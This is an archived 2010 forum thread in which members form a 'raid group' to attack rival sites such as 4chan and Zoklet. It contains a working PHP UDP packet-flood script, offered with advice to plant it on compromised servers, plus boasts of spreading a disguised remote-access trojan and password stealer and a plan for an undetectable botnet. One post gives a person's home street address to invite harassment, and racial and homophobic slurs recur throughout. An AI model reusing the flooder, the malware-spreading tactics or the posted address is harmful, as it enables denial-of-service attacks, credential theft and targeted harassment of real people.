Totse Raid Group

mashlehashmashlehash Regular
edited July 2010 in Spurious Generalities
http://www.totse.info/forum1/group.php?groupid=3

Yeah niggers!

Mafiabro gave me the idea to make this group as I'm Sure it will come in handy!

Comments

• DaSkipperDaSkipper Regular
    edited July 2010
    I joined. Should be fun. You do know we could take down 4chan using it's members? If anyone can get their hands on the 4chan spammer, I have an amazing idea that'll get a few thousand bots within a week.
  • OnesanOnesan Acolyte
    edited July 2010
    Excellent thinking, awaiting orders General mashlehash.
  • mashlehashmashlehash Regular
    edited July 2010
    DaSkipper wrote: »
    I joined. Should be fun. You do know we could take down 4chan using it's members? If anyone can get their hands on the 4chan spammer, I have an amazing idea that'll get a few thousand bots within a week.

Let's here this idea you got.
  • OnesanOnesan Acolyte
    edited July 2010

Targetting a chan would be ill advised under any circumstances, especially with so few members and godaddy as a host here, however i do have something like what you want, its not what i think your thinking of, but its similar, somewhere ive got the source for saviourchan from the pn i could shunt onto onesan.su's uploader if you want for curiosities sake
    edited July 2010
    Onesan wrote: »
    Targetting a chan would be ill advised under any circumstances, especially with so few members and godaddy as a host here, however i do have something like what you want, its not what i think your thinking of, but its similar, somewhere ive got the source for saviourchan from the pn i could shunt onto onesan.su's uploader if you want for curiosities sake

Do it for curiosities sake then.
  • OnesanOnesan Acolyte
    edited July 2010
  • Chimera 1Chimera 1 Acolyte
    edited July 2010
    Someone writing a guide on successful raiding strategies for noobs would improve the firepower of a raiding party
    edited July 2010
    Chimera 1 wrote: »
    Someone writing a guide on successful raiding strategies for noobs would improve the firepower of a raiding party

This is a great idea.
  • DaktologistDaktologist Global Moderator
    edited July 2010
  • mr.bluntmr.blunt Regular
    edited July 2010
  • SHHSHH Acolyte
    edited July 2010
    If we're gonna raid a site, I say raid zoklet.
  • xxombiexxombie Regular
    edited July 2010
    SHH wrote: »

All in good time.
  • Panic!Panic! Regular
    edited July 2010
    SHH wrote: »

Fantastic idea
  • mafiabromafiabro Regular
    edited July 2010
    Fantastic idea
    We strike at dawn. Not really the mods there dont fuck around. We need a little more man power.
  • Panic!Panic! Regular
    edited July 2010
    mafiabro wrote: »
    We strike at dawn. Not really the mods there dont fuck around. We need a little more man power.

Agreed, with their numbers, they could easily stifle our attack quickly enough to form a counter attack
    edited July 2010

I am pretty computer stupid on my own. Give me more info and I don't speak Japanese. My idea is spread around the "4chan spammer," on 4chan but its just an FUD botnet. Every 3 days we reupload a new bot with a new encryption and just keep doing it and doing it.

I spreaded my rat/stealer a year ago on 4chan claiming they were noob tools such as an autoposter and autopic download. I got about 4000+ passwords and on my rat 300+ idiots.
    edited July 2010
    Sounds like you guys are talking about the Low Orbiting Ion Cannon.
    http://encyclopediadramatica.com/LOIC
  • OnesanOnesan Acolyte
    edited July 2010

protip, websites have users coming from everywhere, if you want to ever execute a effective raid coordinated in a asynchronous non realtime format such as a forum you need a raid timer, smaller forums like totse.info need to launch precision attacks to work

also agreed with the manpower issue.
    edited July 2010
    protip, websites have users coming from everywhere, if you want to ever execute a effective raid coordinated in a asynchronous non realtime format such as a forum you need a raid timer.

Twas' a movie quote, highlander.
    edited July 2010
    Sounds like you guys are talking about the Low Orbiting Ion Cannon.
    http://encyclopediadramatica.com/LOIC

No. Not that at all.
    edited July 2010
    We should all send "Thank you" letters to Zok while we're at it.

4420 Clearbrook Ct
    Upper Arlington, OH 43220

Reference: http://regex.info/exif.cgi?url=http%3A%2F%2Fi48.tinypic.com%2F25ib4zs.jpg (Thanks to whoever linked me)

Restrict yourself. We're on GoDaddy.
    edited July 2010
    No. Not that at all.

Well that will get the job done. Of course we would never use such a thing, as that would be against the rules.:)
  • thewandererthewanderer Regular
    edited July 2010
    edited July 2010
    Well that will get the job done. Of course we would never use such a thing, as that would be against the rules.:)

LOiC doesn't work and it is high possible its a virus.
    edited July 2010

It works fine as long as you get the original one. It's just a DdoS-er like many of the other tools. That one is just chan-related. We could use a different one if you dont trust it though. And that's assuming we use it, which we probably wont as that's a different type of raiding all together.
  • OnesanOnesan Acolyte
    edited July 2010
    Twas' a movie quote, highlander.
    oh ok, never seen it, still worth mentioning the time though, ive seen plenty of potentially good raids
    be undone doe to piss poor planning and coordination.

I am pretty computer stupid on my own. Give me more info and I don't speak Japanese. My idea is spread around the "4chan spammer," on 4chan but its just an FUD botnet. Every 3 days we reupload a new bot with a new encryption and just keep doing it and doing it.

I spreaded my rat/stealer a year ago on 4chan claiming they were noob tools such as an autoposter and autopic download. I got about 4000+ passwords and on my rat 300+ idiots.

The japanese has nothing to do with it, thats just my apache mod_uploader module being written by some japanese guy, i guess i misunderstood what you wanted, i thought you were suggesting a direct frontal assault on 4chan, which would be suicide for this site,
    fortunately the owner of totse.info isnt kimmo alm, unfortunately its not hosted on his isp, prq dosent take shit from noone, unlike the cowards at godaddy.

the software i linked to is the patriotic nigras saviourchan chan spammer botnet, its totally legal to use being a voluntary botnet but it shouldnt take much to make it a involuntary one, though i dont get java myself, thought you wanted to do a direct raid, so offered a better tool if it could be modded to suit this task.
    edited July 2010
    oh ok, never seen it, still worth mentioning the time though, ive seen plenty of potentially good raids

Yes we need to pick a time zone and make sure everyone is COMPLETELY clear on when it is. First we need to worry about getting members that need to worry about the time though.
  • OnesanOnesan Acolyte
    edited July 2010

Loic works fine, just as long as you can find a legitimate copy that isnt binded with a trojan (good luck)

oh and here, have a packetflooder if your looking for a versatile, if somewhat not pretty one.
    configure the below correctly, and either run the php code on your box after installing php, for a client side loic style
    attack, or my favorite, upload to a vulnerable box that has either already got a shell on it (google dork for one)
    or hunt down a vulnerable box and get it on there yourself, then hit the correct url to unleash a packetflood from hell on your target.
    denial of service from home isp connections, annoying distracting and with sufficient numbers a effective ddos,
    100mbit line connected dedicated servers and vpses ddosing you is something else entirely.

<?php
    $pakits = 0;

$ip = '127.0.0.1';

$exec_time = 100;

$time = time() + 100;

echo "\nStarted flooding $ip @ ". date('h:i:s',time())." will end @ " . date('h:i:s',$time) . "\n";

for($i=0;$i<65000;$i++){

$out .= 'X';

}

while($time >= time()){

$pakits++;

$rand = rand(1,65000);

$fp = fsockopen('udp://'. $ip, $rand, $errno, $errstr, 5);

if($fp){

fwrite($fp, $out);

fclose($fp);

usleep(1000);

}

}

?>
  • FrYFrY Regular
    edited July 2010
    In like sin, first few days and this site is sounnding moar funner.
    edited July 2010

The japanese has nothing to do with it, thats just my apache mod_uploader module being written by some japanese guy, i guess i misunderstood what you wanted, i thought you were suggesting a direct frontal assault on 4chan, which would be suicide for this site,
    fortunately the owner of totse.info isnt kimmo alm, unfortunately its not hosted on his isp, prq dosent take shit from noone, unlike the cowards at godaddy.

the software i linked to is the patriotic nigras saviourchan chan spammer botnet, its totally legal to use being a voluntary botnet but it shouldnt take much to make it a involuntary one, though i dont get java myself, thought you wanted to do a direct raid, so offered a better tool if it could be modded to suit this task.

We never tell anyone who spammed 4chan with our botnet. It won't be suicide. We get 4chan's own members to DDoS 4chan. And we can steal their passwords and control their computer. It'll be fun on a bun.
  • OnesanOnesan Acolyte
    edited July 2010
    We never tell anyone who spammed 4chan with our botnet. It won't be suicide. We get 4chan's own members to DDoS 4chan. And we can steal their passwords and control their computer. It'll be fun on a bun.

Of course noone here would tell 4chan we did it, i just hope the sysop has banned google and all other search engines thoroughly, otherwise they will hunt you down and find this thread, its what they do.
  • metameta Regular
    edited July 2010
    edited July 2010
    Of course noone here would tell 4chan we did it, i just hope the sysop has banned google and all other search engines thoroughly, otherwise they will hunt you down and find this thread, its what they do.

We delete the shit out of this thread.
  • Malcolm XMalcolm X Regular
    edited July 2010
    wow, this is not /b/. Stop being faggots.:o
  • OnesanOnesan Acolyte
    edited July 2010
    We delete the shit out of this thread.

assuming its deleted before it gets cached forever by google or something else, heh just call me paranoid but i dont want to really see this place destroyed.
  • DirtySanchezDirtySanchez Regular
    edited July 2010
    Im in down with the false totses:mad:
  • metameta Regular
    edited July 2010
    Will this raid group possibly be used against Zoklet?
    edited July 2010
    meta wrote: »
    Will this raid group possibly be used against Zoklet?

Read faggot. No.
  • sAINTsAINT Regular
    edited July 2010
    im so in
  • metameta Regular
    edited July 2010
    Read faggot. No.

Fuck you nigger!:mad::mad:
    edited July 2010
    fuck you nigger!:mad::mad:

u upset?
  • metameta Regular
    edited July 2010
    u upset?

Nah, im just fuckin wit yo ass. U rite, I shud of read tha thread.
    edited July 2010
    Nah, im just fuckin wit yo ass. U rite, I shud of read tha thread.

I like you.
  • YggYgg New Arrival
    edited July 2010
    Erm, faggit children, this forum is running on vbull software. Using the forum to organize raids will have the forum pulled from under your feet, provided it's running legitimate, licensed vbull software.
  • AnonymousAnonymous Regular
    edited July 2010
    Joining now. :cool:
    edited July 2010
    Holy shit. Can someone delete this shit?
  • edited July 2010
    mashlehash wrote: »
    Holy shit. Can someone delete this shit?

LOLOLOLOLOLololOLOLOLL Inb4Delete
    edited July 2010
    I didn't think people would be so blatantly obvious about openly stating places they wanted to hit.
  • LSA KingLSA King Regular
    edited July 2010
    Ygg wrote: »
    Erm, faggit children, this forum is running on vbull software. Using the forum to organize raids will have the forum pulled from under your feet, provided it's running legitimate, licensed vbull software.

lolwut? Vbulletin is just software that is used to run a forum. As far as I know it doesn't connect to Vbulletins servers, so how would they have the authority to shut it down? Plus nearly every NZB indexing site dedicated to pirating stuff off Usenet runs off Vbull.
  • edited July 2010
    How is shutting down a site for twenty mins going to do shit exactly?